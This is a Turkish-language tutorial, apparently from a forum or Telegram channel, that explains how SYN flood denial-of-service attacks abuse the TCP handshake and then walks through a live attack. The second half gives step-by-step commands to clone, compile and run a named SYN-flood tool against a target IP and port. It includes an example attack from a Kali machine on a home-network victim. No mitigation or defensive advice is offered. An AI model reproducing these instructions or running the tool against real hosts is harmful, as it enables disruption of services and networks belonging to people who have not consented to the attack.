Notes

TELEGRAM: @TrDevArsiv

SYN Flood DDoS Attack nedir?

SYN FloodDDoS Attack, bir DDoS saldırı türüdür. Öncelikle DDoS saldırısının ne olduğu ile başlayalım. Distributed denial-of-service (DDoS) attack (Dağıtılmış hizmet reddi saldırısı), hedefin veya çevresindeki altyapının bir internet trafiği baskısı oluşturularak hedeflenen bir sunucunun, hizmetin veya ağın normal trafiğini bozmaya yönelik kötü amaçlı bir girişimdir. Yüksek seviyede yapılan bir DDoS saldırısı karayolunda tıkanmış bir trafiğe benzer ve düzenli trafiğin istenen hedefe ulaşılmasını önler.




Çeşitli katmanlara yapılan çeşitli DDoS saldırıları vardır bugün bizler SYN Flood adlı saldırıyı ele alacağız. SYN Flood, kullanılabilir tüm sunucu kaynaklarını tüketerek bir sunucuyu meşru trafik için kullanılamaz hale getirmeyi amaçlayan bir tür servis reddi (DDoS) saldırısıdır.

Peki bu saldırı nasıl gerçekleşmektedir?

Bildiğimiz üzere ilk bağlantı isteği olan (SYN) paketlerini art arda göndererek, hedeflenen sunucu makinesindeki tüm kullanılabilir bağlantı noktalarını aşabilir ve hedeflenen aygıtın meşru trafiğe yavaş yanıt vermesine veya hiç yanıt vermemesine neden olabilir. SYN Flood saldırıları bir TCP bağlantısının el sıkışma sürecinden yararlanarak çalışır. Normal şartlar altında TCP bağlantısı, bağlantı kurmak için üç farklı işlem gösterir.

Öncelikle, istemci bağlantıyı başlatmak için sunucuya bir bağlantı isteği (SYN) paketi gönderir.

Sunucu bu iletişimi kabul etmek için bu ilk pakete bir bilgi paketi (ACK) ekleyerek SYN/ACK paketiyle yanıt verir.

Son olarak istemci paketin sunucudan alındığını onaylamak için bir bilgi (ACK) paketi döndürür. Bu paket gönderme ve alma dizisini tamamladıktan sonra, TCP bağlantısı açıktır ve veri gönderip alabilir.




İkinci adım adım tamamlandıktan sonra sunucu TCP el sıkışmasının tamamlanması için bekleyecektir. Bu noktada saldırgan, genellikle sahte adresleri olan hedef sunucuya yüksek miktarda SYN paketi gönderir.

Sunucu daha sonra bağlantı isteklerinin her birine yanıt verir ve açık bir bağlantı noktasını yanıtı almaya hazır bırakır.

Sunucu asla gelmeyen son ACK paketini beklerken, saldırgan daha fazla SYN paketi göndermeye devam eder. Yani, sunucu 3. Adımı beklerken saldırgan birinci adımı tekrarlamaya devam eder.

Her yeni SYN paketinin gelmesi, sunucunun belirli bir süre boyunca yeni bir açık bağlantı noktası bağlantısını geçici olarak sürdürmesine neden olur ve kullanılabilir tüm bağlantı noktaları kullanıldıktan sonra sunucu normal şekilde çalışamaz.

Bu saldırı türü 3 farklı şekilde olabilir.

1-Direct Attack(Direkt saldırı): IP adresi gizlenmeden direkt yapılan saldırıdır ve IP adresi gizlenmediği(maskelenmediği) için saldırganın IP adresi engellenerek kolayca durdurulabilir.

2-Spoofed Attack(Sahte saldırı): Saldırgan gönderdiği istek(SYN) paketlerindeki IP’yi gizleyerek(değiştirerek, maskeleyerek) yaptığı bu saldırının engellenmesi direkt saldırıya göre daha zordur, ancak paketler takip edilerek kaynak bulunabilir ve engellenebilir.




3-Distributed Attack(DDoS): Bir Botnet (kısaca robot network veya zombi cihaz) kullanılarak bir saldırı oluşturuluyorsa, saldırının kaynağının geri izlenme olasılığı düşüktür. Ek bir gizlilik düzeyi için, saldırgan dağıtılan her aygıtın paket gönderdiği IP adreslerini de taklit edebilir.

Peki nasıl yapacağız bu saldırıyı?

Biz bu saldırıda Türk yapımı aSYNcrone adlı DDoS aracını kullanacağız.

Kurulum için;

Öncelikle Linux kurulu makinamızda terminali açıyoruz.

Aracı yüklemek için aşağıdaki komutu terminale yazıyoruz.

Kod:
git clone https://github.com/fatih4842/aSYNcrone



Daha sonra aracın bulunduğu dizine giriyoruz.

Kod:
cd aSYNcrone


Daha sonra, aracı kurmak için aşağıdaki komutu giriyoruz.
Kod:
gcc aSYNcrone.c -o aSYNcrone –lpthread



Aracın kullanımını görmek için aşağıdaki komutu giriyoruz.

Kod:
./aSYNcrone

Bizlere nasıl kullanıldığı hakkında bilgi veriyor. Verdiği bilgiye göre;

./aSYNcrone <kaynak port(bağlantı noktası)> <kaynak IP> <hedef port(bağlantı noktası)> <hedef IP>
şeklinde yapabiliyoruz.



192.168.1.41 (saldırgan) - 192.168.1.39 (kurban) olduğunu varsayarsak ve internet erişim portu olan 80 portuna saldırı yaparsak aşağıdaki komutu kullanacağız.

Örn:
Kod:
./aSYNcrone 80 192.168.1.41 80 192.168.1.39


Bu saldırıdan sonra kurbanın internete giriş süreci zorlaşacaktır.

Test amaçlı yukarıdaki bilgilere IP adres bilgilerine sahip olan Kali makinemden Windows makineme bir saldırı yapıp sonuçlarına bakalım.

Saldırıyı başlattığımızda böyle bir ekran alıyoruz.



Ve kurbanın internet bağlantı portuna saldırdığımız için, internete bağlantı hızı yavaşlıyor.



Saldırıyı “Ctrl + c” ile durdurabiliriz. Saldırıyı durdurduktan sonra araç bizlere kaç tane paket gönderildiğini ve paket gönderme işleminin(saldırının) ne kadar sürdüğü hakkında bilgi veriyor.

Botnet hakkında daha fazla bilgi için tıklayınız. https://www.wikizeroo.org/wiki/tr/Botnet


SYN Flood DDoS Attack hakkında daha fazla bilgi için tıklayınız.

https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/